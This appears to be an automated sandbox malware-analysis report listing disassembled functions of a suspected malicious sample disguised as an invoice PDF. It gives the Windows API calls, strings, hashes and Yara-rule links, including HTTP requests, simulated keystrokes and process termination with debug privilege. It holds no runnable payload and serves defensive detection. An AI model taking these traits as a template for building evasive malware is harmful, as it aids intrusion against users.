Function 00415BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00415C7A

Part of subcall function 00415D0A: GetClientRect.USER32(?,?), ref: 00415D30
Part of subcall function 00415D0A: GetWindowRect.USER32(?,?), ref: 00415D71
Part of subcall function 00415D0A: ScreenToClient.USER32(?,?), ref: 00415D99

GetDC.USER32 ref: 004546F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00454708
SelectObject.GDI32(00000000,00000000), ref: 00454716
SelectObject.GDI32(00000000,00000000), ref: 0045472B
ReleaseDC.USER32(?,00000000), ref: 00454733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 004547C4

Strings

U, xrefs: 00454693

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 35b70a7b7996833853d03c08335a8f43a9e06e71ff8c86c7ce4ac674f8b758aa
Instruction ID: 887fb8666af04f3ee60c595cc3ab95fc0868f9ada7a6041cbaf17a9e9da7969d
Opcode Fuzzy Hash: 35b70a7b7996833853d03c08335a8f43a9e06e71ff8c86c7ce4ac674f8b758aa
Instruction Fuzzy Hash: E171DE34400205DFCF218F64C984AEA3BB1FF8A32AF14426BED555E267D7388886DF58

Function 0048359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004835E4

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

LoadStringW.USER32(004E2390,?,00000FFF,?), ref: 0048360A

Strings

Error: , xrefs: 004836EF
Line %d (File "%s"):, xrefs: 0048366B
"%s" (%d) : ==> %s:, xrefs: 00483742
"%s" (%d) : ==> %s:%s%s, xrefs: 00483724
^ ERROR, xrefs: 004836C9

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: cf1e5bb6c8e3a00332763cd5c78fc61bffd2b7a54f9730eb4ebd935b89d906fc
Instruction ID: 4c2bca62849440ba06ab7cf45b7e745419e897b1c1e1e03a16b17439adab886e
Opcode Fuzzy Hash: cf1e5bb6c8e3a00332763cd5c78fc61bffd2b7a54f9730eb4ebd935b89d906fc
Instruction Fuzzy Hash: E5517071800209AADF14EFA1CC92EEEBB35AF04745F14452BF505721A1EB386AD9DF68

Function 0048C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0048C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0048C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0048C2CA
GetLastError.KERNEL32 ref: 0048C322
SetEvent.KERNEL32(?), ref: 0048C336
InternetCloseHandle.WININET(00000000), ref: 0048C341

Strings

, xrefs: 0048C2BB

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 74b0636c93e256869bad559c5974195124dd36c9636d8b7d25542fd185a0c4db
Instruction ID: dcca571e5fa73f26138b9223ec9660c497b26d26be665a6c4ee5f2301c3f81ee
Opcode Fuzzy Hash: 74b0636c93e256869bad559c5974195124dd36c9636d8b7d25542fd185a0c4db
Instruction Fuzzy Hash: 6A316F71500604AFD721AF6598C4AAF7BFCEB49744B10892FF84692240DB38DD059B79

Function 0047989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00453AAF,?,?,Bad directive syntax error,004ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 004798BC
LoadStringW.USER32(00000000,?,00453AAF,?), ref: 004798C3

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00479987

Strings

Line %d:, xrefs: 00479912
Line %d (File "%s"):, xrefs: 0047992D
., xrefs: 0047996D
Error: , xrefs: 00479955
%s (%d) : ==> %s.: %s %s, xrefs: 004798F1

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 78bfa9388205837fb4847c15ec313f4154435ad1bf2d41b4fed9d28349525453
Instruction ID: 5e73d1bf454e12fe2114cdb077473c7e2ec109ca6bea76091fc6e4f3dc4d1393
Opcode Fuzzy Hash: 78bfa9388205837fb4847c15ec313f4154435ad1bf2d41b4fed9d28349525453
Instruction Fuzzy Hash: BA21B47190021EBBDF11AF90CC16EEE7775FF14704F04442BF915621A2EB39AA68DB58

Function 0047209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 004720AB
GetClassNameW.USER32(00000000,?,00000100), ref: 004720C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0047214D

Strings

SHELLDLL_DefView, xrefs: 004720CC
details, xrefs: 004720FB
largeicons, xrefs: 004720E1
smallicons, xrefs: 00472115
list, xrefs: 0047212F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 480a8efdf70b991f5fc79afe6b89803628bf79b93d37c7c71f2b55f650fe3af9
Instruction ID: 611cbf69ee29b9cdf684a2aa189dc85727efe1fc5bc048144b682bf17ae3cdaf
Opcode Fuzzy Hash: 480a8efdf70b991f5fc79afe6b89803628bf79b93d37c7c71f2b55f650fe3af9
Instruction Fuzzy Hash: 2B110676688707B9FA017621DD16DE7379CEB09328F60902BFB08B51D2EEAD7802565C

Function 0044CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0044CEB7
_free.LIBCMT ref: 0044CF22
_free.LIBCMT ref: 0044CF48
_free.LIBCMT ref: 0044CF71
_free.LIBCMT ref: 0044CFA9
_free.LIBCMT ref: 0044CFDA
_free.LIBCMT ref: 0044D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044D09C
_free.LIBCMT ref: 0044D0B5

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 0f6d594d9b792e19d64dba72ca68b34b4ada623c32d40a52b9590f8e37912daa
Instruction ID: 750c0a0e7a1f753b1cb60f520546c754aa0ddf1d1d4dabc90750fc9e587da608
Opcode Fuzzy Hash: 0f6d594d9b792e19d64dba72ca68b34b4ada623c32d40a52b9590f8e37912daa
Instruction Fuzzy Hash: 4D6138B1A05200ABFB21AFB59CC1A6A7B95EF05314F08416FF9409B3C2DB7D9D45876C

Function 004A50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 004A5186
ShowWindow.USER32(?,00000000), ref: 004A51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 004A51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 004A51D1

Part of subcall function 004A6FBA: DeleteObject.GDI32(00000000), ref: 004A6FE6

GetWindowLongW.USER32(?,000000F0), ref: 004A520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004A521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004A524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 004A5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 004A5296

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 4dae0dfdfd476c2aa48fa25c51bbe57a1ae172c8eb4568f9b9190ad095340892
Instruction ID: 69ba058bb8be9b76220c75f41f7b70ee9f71c54bdad541af24d19ba7e72f6293
Opcode Fuzzy Hash: 4dae0dfdfd476c2aa48fa25c51bbe57a1ae172c8eb4568f9b9190ad095340892
Instruction Fuzzy Hash: 8951C131A40A08FEEF309F25DD45BE93B61EB26324F144057F6149A2E1C779A980DF49

Function 00428B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00466890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 004668A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 004668B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 004668D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 004668F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00428874,00000000,00000000,00000000,000000FF,00000000), ref: 00466901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0046691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00428874,00000000,00000000,00000000,000000FF,00000000), ref: 0046692D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: fa81703eb3a7b5ad67dffe79f50e50ce3408a4c78cab3e762331d8884ff2e4a0
Instruction ID: bd1738f8097e962daaaf6b2cb2eb0be89b6a46b8e53ad3f6cd96e8920b93ee01
Opcode Fuzzy Hash: fa81703eb3a7b5ad67dffe79f50e50ce3408a4c78cab3e762331d8884ff2e4a0
Instruction Fuzzy Hash: 9F518BB0601209EFDB20CF25DC95FAA7BB5FB48750F10452EF902972A0EB78E951DB58

Function 0048C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0048C182
GetLastError.KERNEL32 ref: 0048C195
SetEvent.KERNEL32(?), ref: 0048C1A9

Part of subcall function 0048C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0048C272
Part of subcall function 0048C253: GetLastError.KERNEL32 ref: 0048C322
Part of subcall function 0048C253: SetEvent.KERNEL32(?), ref: 0048C336
Part of subcall function 0048C253: InternetCloseHandle.WININET(00000000), ref: 0048C341

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: b216da24480443753077756372bf9f2dc18e2b4ffd6eb7504d4b1429d7cdc380
Instruction ID: b03f585cd010f89a7b7b3a1440e4f4ff447f781d7afdfc5ace4c113a7b38417c
Opcode Fuzzy Hash: b216da24480443753077756372bf9f2dc18e2b4ffd6eb7504d4b1429d7cdc380
Instruction Fuzzy Hash: 40317071900601AFDB21AFA5DC84A6BBBE9FF15300B04496EF95682650DB39E8149FB8

Function 004725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00473A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00473A57
Part of subcall function 00473A3D: GetCurrentThreadId.KERNEL32 ref: 00473A5E
Part of subcall function 00473A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004725B3), ref: 00473A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 004725BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004725DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004725DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 004725E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00472601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00472605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0047260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00472623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00472627

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: cc795c06aee6b687c30220c1268515723e3d365f9cec9b3b9c9fbbb93e9b046d
Instruction ID: 84133b2d2f81a885ff98e46ed22a8c0740ef85e32ad420e8fde034ecc074791b
Opcode Fuzzy Hash: cc795c06aee6b687c30220c1268515723e3d365f9cec9b3b9c9fbbb93e9b046d
Instruction Fuzzy Hash: 7C01D471390210BBFB106B699CCAF993F59DB4EB12F104016F318AE0D1C9E224459E6E

Function 00471803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00471449,?,?,00000000), ref: 0047180C
HeapAlloc.KERNEL32(00000000,?,00471449,?,?,00000000), ref: 00471813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00471449,?,?,00000000), ref: 00471828
GetCurrentProcess.KERNEL32(?,00000000,?,00471449,?,?,00000000), ref: 00471830
DuplicateHandle.KERNEL32(00000000,?,00471449,?,?,00000000), ref: 00471833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00471449,?,?,00000000), ref: 00471843
GetCurrentProcess.KERNEL32(00471449,00000000,?,00471449,?,?,00000000), ref: 0047184B
DuplicateHandle.KERNEL32(00000000,?,00471449,?,?,00000000), ref: 0047184E
CreateThread.KERNEL32(00000000,00000000,00471874,00000000,00000000,00000000), ref: 00471868

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 99b6ec243ee29bfd6e9bdd53b6a3671cc3cdae3326ceb848c7fb3a9835a12599
Instruction ID: bfcffbb60fd692dca6b937531f55aaf4c7be63ec40b69a2cd0da393570e40acd
Opcode Fuzzy Hash: 99b6ec243ee29bfd6e9bdd53b6a3671cc3cdae3326ceb848c7fb3a9835a12599
Instruction Fuzzy Hash: 4101ACB5340304BFE650ABA5DC89F573BACEB8AB11F014421FA05DB1A1DA749C008F24

Function 0049A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0047D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0047D501
Part of subcall function 0047D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0047D50F
Part of subcall function 0047D4DC: CloseHandle.KERNEL32(00000000), ref: 0047D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0049A16D
GetLastError.KERNEL32 ref: 0049A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0049A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0049A268
GetLastError.KERNEL32(00000000), ref: 0049A273
CloseHandle.KERNEL32(00000000), ref: 0049A2C4

Strings

SeDebugPrivilege, xrefs: 0049A18F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 76b09685bb8facaffb64b9d9d86d4b523998a7f06c773f0385d8f261f788a476
Instruction ID: 36f2df698d255feddc6e8a26eca3dc0c4ee3e7c4f17fa9341202c8a72a231482
Opcode Fuzzy Hash: 76b09685bb8facaffb64b9d9d86d4b523998a7f06c773f0385d8f261f788a476
Instruction Fuzzy Hash: B9616030204241AFDB10DF15C495F56BBE1AF44318F1484AEE46A4B7A3C77AED45CBDA

Function 004A3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004A3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004A393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004A3954
_wcslen.LIBCMT ref: 004A3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 004A39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 004A39F4

Strings

SysListView32, xrefs: 004A38F7

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: e8de5c6cb76dbd63778f93a435e166ace9dae01d8fa2b12ffa6c3295429251fc
Instruction ID: ccd2430a9be2a533bf818e9775e89bebad9ccd98701324f406f60594f99308b5
Opcode Fuzzy Hash: e8de5c6cb76dbd63778f93a435e166ace9dae01d8fa2b12ffa6c3295429251fc
Instruction Fuzzy Hash: D941C571A00218ABEB21DF64CC45FEB7BA9EF19354F10012BF944E7291E7799D84CB98

Function 0047BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0047BCFD
IsMenu.USER32(00000000), ref: 0047BD1D
CreatePopupMenu.USER32 ref: 0047BD53
GetMenuItemCount.USER32(00E55B90), ref: 0047BDA4
InsertMenuItemW.USER32(00E55B90,?,00000001,00000030), ref: 0047BDCC

Strings

2, xrefs: 0047BD37
0, xrefs: 0047BCA8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 45650f18d7a7bbd6b64570c21c9fccb71755610dcfcb28475d05258f060b191a
Instruction ID: 06c1102c7ce32793cf09bb3edbd64f06b4a9908b57febe5af0d55aa46d925c25
Opcode Fuzzy Hash: 45650f18d7a7bbd6b64570c21c9fccb71755610dcfcb28475d05258f060b191a
Instruction Fuzzy Hash: 5A51AD70A00205AFDB21CFA9C8C4BEEBBF5EF45314F14C12AE45997390E7789945CB99

Function 00432D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00432D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00432D53
_ValidateLocalCookies.LIBCMT ref: 00432DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00432E0C
_ValidateLocalCookies.LIBCMT ref: 00432E61

Strings

csm, xrefs: 00432DF6
&HC, xrefs: 00432DFE, 00432E07, 00432E18

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &HC$csm
API String ID: 1170836740-3574481041
Opcode ID: b052d583835687b0c5e66397fabd623dd367a59914160ab0b7e6a30e5a391072
